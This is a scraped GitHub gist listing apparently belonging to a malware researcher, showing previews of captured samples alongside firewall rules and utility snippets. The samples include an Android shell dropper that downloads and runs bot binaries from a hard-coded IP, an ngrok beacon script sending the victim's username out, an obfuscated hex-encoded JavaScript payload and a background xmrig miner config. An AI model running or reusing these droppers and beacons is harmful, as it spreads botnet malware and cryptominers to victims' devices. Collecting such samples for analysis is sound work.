Remco Verhoef
nl5887
nl5887
/ gist:9cb88cf2ef9849d3873b611bce3b0aaa
Created Jan 3, 2019
View gist:9cb88cf2ef9849d3873b611bce3b0aaa
| A1/knnUWULU2NiOgmM//YB9bTMpU+Zg3JfBube+UUTbHcbV0/akpEn/3VnZb7lYTDCxazq0efcDarXzQK6X1Xnk4pAYgqCOhlLjjqhSLWk6Uy+c8Fd0Q69dhMG4neFv2HbTohqdIrv+5iixaKhxP3lMJVW5TAiuRJrHiMA5z4MxgTX89Oz8jM+S5bcQhKVPfk8LrRLFk2Zlp7hj68e2Cqaa/wQC8osJPLm/Y/ejJgjQg4WpHJ+bEEZWIRmr0dhsZLYSWBn1FEMzv43KkrDAmb1gM9G63Llxj8MfZlOcZXcnDgn7e4ytoL56mkcBUOEYmG/5JJ2OQvIkcheq+77rztisgsPxSVdo+KQyVbYrCvFCHb2Eh | |
| A1/kzSIfAKdirHqv4ILCwBmTbiutpRbIQIGZJ38p5ugwNTjDYvnj73yC/sZbhoIXG/x4OwI4SgwijkqkiBELYSBf13gS5Y1pxnswZuhytjkpsBpBUCmsggE27TRtm9BD9V+BuQOIlPigmmJ6G+4dWnc4kCNkdh/4ga7Ym2AzuPDK0TgDkyds4OSkh271uGC0Q6WC0YleKGaF6oi1rMSUhI8NqzBtVTwNafUR49t0LxArB9DQuSzbGVqXBnPZpSKsfkq0Wv+vaDekCouZ6vFQ2YPXr8IxRXoxxGHgJVuANxPPb3jzHcSgo76BX2i4OLNeS1k1lZqmgUc7qz7XgNxlnTAKaSAu4kLjgZkrE8tpFU3LqFRece8D84Sy | |
| A16zzHwSVQTcEZqvZ61pmw0hpca/WzVMF2kP89s5/9I4y2J47hcQidU1h4pzyZdA0F5QtAzrEKkveIpAQEPdX3/74CBVf5qE49Dmy6Od4YQgpEoX2KXGrHUJC+HsVZUr5efGu1H1aLiZH1Y/0mxvzVRuYZDN01jLAXDhTEOfFbAarX86B5ckT/3VdO2gdNvvku/26rHdLC0SbiwyfElwCz9SMePTI+TT5hlnmh2oTwzy5+UwUUBVwJAAU2LkT2OAIOzdPpWVvSLYSKRqP7xaPI |
nl5887
/ gist:9f3413ed486b117134c59aa4daee17b8
Created Nov 29, 2018
View gist:9f3413ed486b117134c59aa4daee17b8
| MD5 (/Users/remco/Downloads/paimon.x86) = 5efce325c5aa2fa11553bf6a4bd94b74 | |
| arch x86 | |
| baddr 0x8048000 | |
| binsz 37184 | |
| bintype elf | |
| bits 32 | |
| canary false | |
| sanitiz false | |
| class ELF32 |
View config.json
| { | |
| "algo": "cryptonight", // cryptonight (default) or cryptonight-lite | |
| "av": 0, // algorithm variation, 0 auto select | |
| "background": true, // true to run the miner in the background | |
| "colors": true, // false to disable colored output | |
| "cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1 | |
| "cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest) | |
| "donate-level": 3, // donate level, mininum 1% | |
| "log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log" | |
| "max-cpu-usage": 65, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option. |
nl5887
/ payloadA.js
Created Nov 27, 2018
View payloadA.js
| function d() { | |
| function decode(codedString) { | |
| return Buffer.from(codedString, "hex").toString(); | |
| } | |
| var data = ["75d4c87f3f69e0fa292969072c49dff4f90f44c1385d8eb60dae4cc3a229e52cf61f78b0822353b4304e323ad563bc22c98421eb6a8c1917e30277f716452ee8d57f9838e00f0c4e4ebd7818653f00e72888a4031676d8e2a80ca3cb00a7396ae3d140135d97c6db00cab172cbf9a92d0b9fb0f73ff2ee4d38c7f6f4b30990f2c97ef39ae6ac6c828f5892dd8457ab530a519cd236ebd51e1703bcfca8f9441c2664903af7e527c420d9263f4af58ccb5843187aa0da1cbb4b6aedfd1bdc6faf32f38a885628612660af8630597969125c917dfc512c53453c96c143a2a058ba91bc37e265b44c5874e594caaf53961c82904a95f1dd33b94e4dd1d00e9878f66dafc55fa6f2f77ec7e7e8fe28e4f959eab4707557b263ec74b2764033cd343199eeb6140a6284cb009a09b143dce784c2cd40dc320777deea6fbdf183f787fa7dd3ce2139999343b488a4f5bcf3743eecf0d30928727025ff3549808f7f711c9f7614148cf43c8aa7ce9b3fcc1cff4bb0df75cb2021d0f4afe5784fa80fed245ee3f0911762fffbc36951a78457b94629f067c1f12927cdf97699656f4a2c4429f1279c4ebacde10fa7a6f5c44b14bc88322a3f06bb0847f0456e63088 |
View ngrok.sh
| export HOST="http://0c9afa50.ngrok.io" | |
| export RIP="97cc76838c10360ea07e82b225d1d306" | |
| reportinfo() { | |
| local _usr="$(whoami 2>/dev/null)" | |
| local _url="$HOST/m?o=$(pido)&r=${RIP}&t=${PROCS}&l=d&u=${_usr}" | |
| if type "wget" >/dev/null 2>&1 ; then | |
| wget -q "${_url}" >/dev/null 2>&1 | |
| elif type "curl" >/dev/null 2>&1 ; then |
View gist:2dc04e80c09286a687a957f61b35e123
| ipset create blocklist iphash | |
| iptables -A INPUT -m set --match-set blocklist src -j DROP | |
| ipset add blocklist {ip} |
View gist:32cf9f5f5155991367ca58dd37cfd8ae
| -A DOCKER-USER -i eth0 -j DROP | |
| -A DOCKER-USER -j RETURN |
nl5887
/ gist:d994f61adf9b052d48ad3f0c16c5b130
Created Sep 10, 2018
import record based json into elasticsearch
View gist:d994f61adf9b052d48ad3f0c16c5b130
| cat json3 | jq -c '{ "index": {"_index": "bang", "_type": "file"}}, . + { "firmware": "json3" }' | curl -s -H "Content-Type: application/json" -XPUT "http://127.0.0.1:9200/_bulk" --data-binary @- |
View adbs
| #!/bin/sh | |
| n="arm.bot.le mips.bot.be mipsel.bot.le arm7.bot.le x86_64.bot.le i586.bot.le i686.bot.le" | |
| http_server="95.215.62.169" | |
| for a in $n | |
| cp /system/bin/sh $a | |
| >$a | |
| busybox wget http://$http_server/$a -O -> $a | |
| chmod 777 $a | |
| ./$a | |
| done |
View forward.go
| package main | |
| import ( | |
| "fmt" | |
| "io" | |
| "net" | |
| "os" | |
| ) | |
| func main() { |
NewerOlder